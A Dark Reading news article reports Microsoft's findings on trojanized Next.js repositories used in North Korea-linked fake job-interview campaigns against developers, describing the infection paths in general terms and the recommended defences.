TechTarget and Informa Tech’s Digital Business Combine. Dark Reading Resource Library Black Hat News Omdia Cybersecurity Advertise NEWSLETTER SIGN-UP Cybersecurity Topics World The Edge DR Technology Events Resources CYBERATTACKS & DATA BREACHES REMOTE WORKFORCE ENDPOINT SECURITY THREAT INTELLIGENCE NEWS Malicious Next.js Repos Target Developers Via Fake Job Interviews Linked to North Korean fake job-recruitment campaigns, the poisoned repositories are aimed at establishing persistent access to infected machines. Elizabeth Montalbano,Contributing Writer February 25, 2026 3 Min Read SOURCE: EVERYTHING POSSIBLE VIA ADOBE STOCK Attackers are targeting developers with malicious Next.js repositories to perform remote code execution (RCE) and establish a persistent command-and-control (C2) channel on infected machines in a campaign tied to North Korea's fake job-recruitment scams. Microsoft sounded the alarm on the activity, which delivers malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender Experts and the Microsoft Defender Security Research Team discovered various Trojanized repositories that offered different execution paths for delivery of a backdoor to compromise developer systems. "The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control," according to a blog post published Tuesday by the two Microsoft security teams. Related:Lazarus Group Picks a New Poison: Medusa Ransomware Without specifically attributing the campaign to North Korea, the researchers noted that the activity "aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution," a cluster associated with North Korea's Lazarus APT. The blog post also includes links to third-party research earlier this year about North Korean APT activity tied to Microsoft Visual Studio Code. Indeed, North Korean actors for years have been persistently targeting developers by dangling job opportunities that, as part of a fake job interview, ask them to participate in sample development challenges that deliver malicious code to their machines. "This developer‑targeting campaign shows how a recruiting‑themed 'interview project' can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend," the blog post stated. The ultimate objective of the campaign is to gain execution on developer systems that often contain high‑value assets such as source code, environment secrets, and access to build or cloud resources, according to Microsoft. The campaign once again demonstrates how developer workflows are a primary attack surface for cyber espionage and other activity that can lead to further compromise of the entire software supply chain, according to the researchers. LOADING... Repositories Leading to Backdoor Activity The researchers discovered the campaign recently when Microsoft Defender flagged suspicious outbound connections from Node.js processes to attacker-controlled infrastructure, eventually tracking the activity to Next.js repositories all exhibiting the same malicious behavior. Next.js is a widely used open source Web development framework maintained by cloud software vendor Vercel. Related:Singapore & Its 4 Major Telcos Fend Off Chinese Hackers The malicious repositories initiate one of two execution paths that deliver a lightweight registration stage to establish host identity as well as bootstrap code. These eventually lead to runtime retrieval and in-memory invocation of attacker-controlled JavaScript that turns into a persistent C2 connection for delivering further payloads and exfiltrating data from infected systems. Some repositories abuse Visual Studio Code workspace automation by including a .vscode/tasks.json configured to execute tasks automatically when a workspace is opened and trusted, triggering a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious logic directly into development assets so that when a developer runs standard build commands or starts a development server, the disguised code decodes and fetches additional payloads. Developer Attacks Rage On North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021 when security researchers uncovered the Dream Jobs campaign, sending fake job offers that linked to malicious Web files. This campaign eveolved into more sophisticated socially engineered attacks in which developers were lured into participating in fake development projects or recruitment challenges that delivered spyware and other malware. Related:Operation DoppelBrand: Weaponizing Fortune 500 Brands The latest discovery of weaponized Next.js repositories illustrates threat actors' commitment to target developers not only to establish a spy channel but also to poison the software supply chain as a whole. To defend against this, secrity operations teams and DevSecOps leaders "should treat developer workflows as a privileged attack surface, integrating IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs," according to Microsoft. Organizations can do this by enforcing strict trust policies for IDEs like Visual Studio Code; deploying attack surface reduction rules via Microsoft Defender for Endpoint to constrain risky script execution behaviors; and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints. About the Author Elizabeth Montalbano Contributing Writer Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking. More Insights Industry Reports ThreatLabz 2025 Ransomware Report The Total Economic Impact™ Of Zscaler Private Access (ZPA) Zscaler ThreatLabz 2025 VPN Risk Report GigaOm Radar for CNAPP The Total Economic Impact™ of Google SecOps Access More Research Webinars Building a Robust SOC in a Post-AI World Retail Security: Protecting Customer Data and Payment Systems Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models More Webinars You May Also Like CYBERATTACKS & DATA BREACHES Critical Fortinet Vuln Draws Fresh Attention by Jai Vijayan, Contributing Writer MAR 19, 2025 CYBERATTACKS & DATA BREACHES Cyberattackers Target LastPass, Top Password Managers by Nate Nelson, Contributing Writer OCT 16, 2025 CYBERATTACKS & DATA BREACHES Oracle Still Denies Breach as Researchers Persist by Jai Vijayan, Contributing Writer MAR 28, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice ENDPOINT SECURITY Ivanti EPMM Zero-Day Bugs Spark Exploit Frenzy — Again byNate Nelson FEB 12, 2026 6 MIN READ CYBER RISK Those 'Summarize With AI' Buttons May Be Lying to You byJai Vijayan FEB 12, 2026 5 MIN READ CYBERATTACKS & DATA BREACHES Senegalese Data Breaches Expose Lack of Security Maturity byNate Nelson FEB 12, 2026 5 MIN READ 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Building a Robust SOC in a Post-AI World THURS, MARCH 19, 2026 AT 1PM EST Retail Security: Protecting Customer Data and Payment Systems THURS, APRIL 2, 2026 AT 1PM EST Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need WED, APRIL 1, 2026 AT 1PM EST Securing Remote and Hybrid Work Forecast: Beyond the VPN TUES, MARCH 10, 2026 AT 1PM EST AI-Powered Threat Detection: Beyond Traditional Security Models WED, MARCH 25, 2026 AT 1PM EST More Webinars White Papers Industry Report: AI, SOC, and Modernizing Cybersecurity The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Assessing Security Architectures: Zero Trust vs. Network-Centric Models 5 Steps to Stop Ransomware With Zero Trust 10 Ways a Zero Trust Architecture Protects Against Ransomware Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE Discover More Black Hat Omdia Working With Us About Us Advertise Reprints Join Us NEWSLETTER SIGN-UP Follow Us Copyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is